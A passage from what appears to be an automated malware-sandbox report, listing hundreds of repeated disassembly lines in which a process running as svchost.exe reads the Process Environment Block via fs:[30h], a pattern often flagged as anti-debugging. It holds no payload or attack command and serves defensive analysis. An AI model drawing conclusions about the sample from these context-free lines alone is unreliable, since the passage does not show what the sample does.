                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E284 mov eax, dword ptr fs:[00000030h]2_2_0376E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h]2_2_037B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h]2_2_037B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h]2_2_037B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C156 mov eax, dword ptr fs:[00000030h]2_2_0372C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C8158 mov eax, dword ptr fs:[00000030h]2_2_037C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736154 mov eax, dword ptr fs:[00000030h]2_2_03736154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736154 mov eax, dword ptr fs:[00000030h]2_2_03736154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov ecx, dword ptr fs:[00000030h]2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03760124 mov eax, dword ptr fs:[00000030h]2_2_03760124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA118 mov ecx, dword ptr fs:[00000030h]2_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h]2_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h]2_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h]2_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038061E5 mov eax, dword ptr fs:[00000030h]2_2_038061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F0115 mov eax, dword ptr fs:[00000030h]2_2_037F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037601F8 mov eax, dword ptr fs:[00000030h]2_2_037601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F61C3 mov eax, dword ptr fs:[00000030h]2_2_037F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F61C3 mov eax, dword ptr fs:[00000030h]2_2_037F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]2_2_037B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]2_2_037B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]2_2_037B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]2_2_037B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804164 mov eax, dword ptr fs:[00000030h]2_2_03804164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804164 mov eax, dword ptr fs:[00000030h]2_2_03804164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A197 mov eax, dword ptr fs:[00000030h]2_2_0372A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A197 mov eax, dword ptr fs:[00000030h]2_2_0372A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A197 mov eax, dword ptr fs:[00000030h]2_2_0372A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03770185 mov eax, dword ptr fs:[00000030h]2_2_03770185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EC188 mov eax, dword ptr fs:[00000030h]2_2_037EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EC188 mov eax, dword ptr fs:[00000030h]2_2_037EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D4180 mov eax, dword ptr fs:[00000030h]2_2_037D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D4180 mov eax, dword ptr fs:[00000030h]2_2_037D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375C073 mov eax, dword ptr fs:[00000030h]2_2_0375C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03732050 mov eax, dword ptr fs:[00000030h]2_2_03732050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6050 mov eax, dword ptr fs:[00000030h]2_2_037B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6030 mov eax, dword ptr fs:[00000030h]2_2_037C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A020 mov eax, dword ptr fs:[00000030h]2_2_0372A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C020 mov eax, dword ptr fs:[00000030h]2_2_0372C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B4000 mov ecx, dword ptr fs:[00000030h]2_2_037B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C0F0 mov eax, dword ptr fs:[00000030h]2_2_0372C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037720F0 mov ecx, dword ptr fs:[00000030h]2_2_037720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0372A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037380E9 mov eax, dword ptr fs:[00000030h]2_2_037380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B60E0 mov eax, dword ptr fs:[00000030h]2_2_037B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B20DE mov eax, dword ptr fs:[00000030h]2_2_037B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F60B8 mov eax, dword ptr fs:[00000030h]2_2_037F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F60B8 mov ecx, dword ptr fs:[00000030h]2_2_037F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037280A0 mov eax, dword ptr fs:[00000030h]2_2_037280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C80A8 mov eax, dword ptr fs:[00000030h]2_2_037C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373208A mov eax, dword ptr fs:[00000030h]2_2_0373208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738770 mov eax, dword ptr fs:[00000030h]2_2_03738770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730750 mov eax, dword ptr fs:[00000030h]2_2_03730750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE75D mov eax, dword ptr fs:[00000030h]2_2_037BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772750 mov eax, dword ptr fs:[00000030h]2_2_03772750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772750 mov eax, dword ptr fs:[00000030h]2_2_03772750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B4755 mov eax, dword ptr fs:[00000030h]2_2_037B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376674D mov esi, dword ptr fs:[00000030h]2_2_0376674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376674D mov eax, dword ptr fs:[00000030h]2_2_0376674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376674D mov eax, dword ptr fs:[00000030h]2_2_0376674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376273C mov eax, dword ptr fs:[00000030h]2_2_0376273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376273C mov ecx, dword ptr fs:[00000030h]2_2_0376273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376273C mov eax, dword ptr fs:[00000030h]2_2_0376273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AC730 mov eax, dword ptr fs:[00000030h]2_2_037AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C720 mov eax, dword ptr fs:[00000030h]2_2_0376C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C720 mov eax, dword ptr fs:[00000030h]2_2_0376C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730710 mov eax, dword ptr fs:[00000030h]2_2_03730710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03760710 mov eax, dword ptr fs:[00000030h]2_2_03760710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C700 mov eax, dword ptr fs:[00000030h]2_2_0376C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037347FB mov eax, dword ptr fs:[00000030h]2_2_037347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037347FB mov eax, dword ptr fs:[00000030h]2_2_037347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]2_2_037527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]2_2_037527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]2_2_037527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE7E1 mov eax, dword ptr fs:[00000030h]2_2_037BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373C7C0 mov eax, dword ptr fs:[00000030h]2_2_0373C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B07C3 mov eax, dword ptr fs:[00000030h]2_2_037B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037307AF mov eax, dword ptr fs:[00000030h]2_2_037307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E47A0 mov eax, dword ptr fs:[00000030h]2_2_037E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D678E mov eax, dword ptr fs:[00000030h]2_2_037D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03762674 mov eax, dword ptr fs:[00000030h]2_2_03762674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F866E mov eax, dword ptr fs:[00000030h]2_2_037F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F866E mov eax, dword ptr fs:[00000030h]2_2_037F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A660 mov eax, dword ptr fs:[00000030h]2_2_0376A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A660 mov eax, dword ptr fs:[00000030h]2_2_0376A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374C640 mov eax, dword ptr fs:[00000030h]2_2_0374C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E627 mov eax, dword ptr fs:[00000030h]2_2_0374E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03766620 mov eax, dword ptr fs:[00000030h]2_2_03766620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768620 mov eax, dword ptr fs:[00000030h]2_2_03768620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373262C mov eax, dword ptr fs:[00000030h]2_2_0373262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772619 mov eax, dword ptr fs:[00000030h]2_2_03772619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE609 mov eax, dword ptr fs:[00000030h]2_2_037AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B06F1 mov eax, dword ptr fs:[00000030h]2_2_037B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B06F1 mov eax, dword ptr fs:[00000030h]2_2_037B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0376A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A6C7 mov eax, dword ptr fs:[00000030h]2_2_0376A6C7
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037666B0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0376C6A6 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03734690 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03734690 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03738550 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03738550 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037C6500 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037325E0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0376C5ED mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0376C5ED mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037365D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0376A5D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0376A5D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0376E5CF mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0376E5CF mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037545B1 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037545B1 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0376E59C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03732582 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03732582 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03764588 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037BC460 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037EA456 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0372645D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0375245A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0376A430 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0372C427 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037304E5 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037644B0 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037BA4B0 mov eax, dword ptr fs:[00000030h]
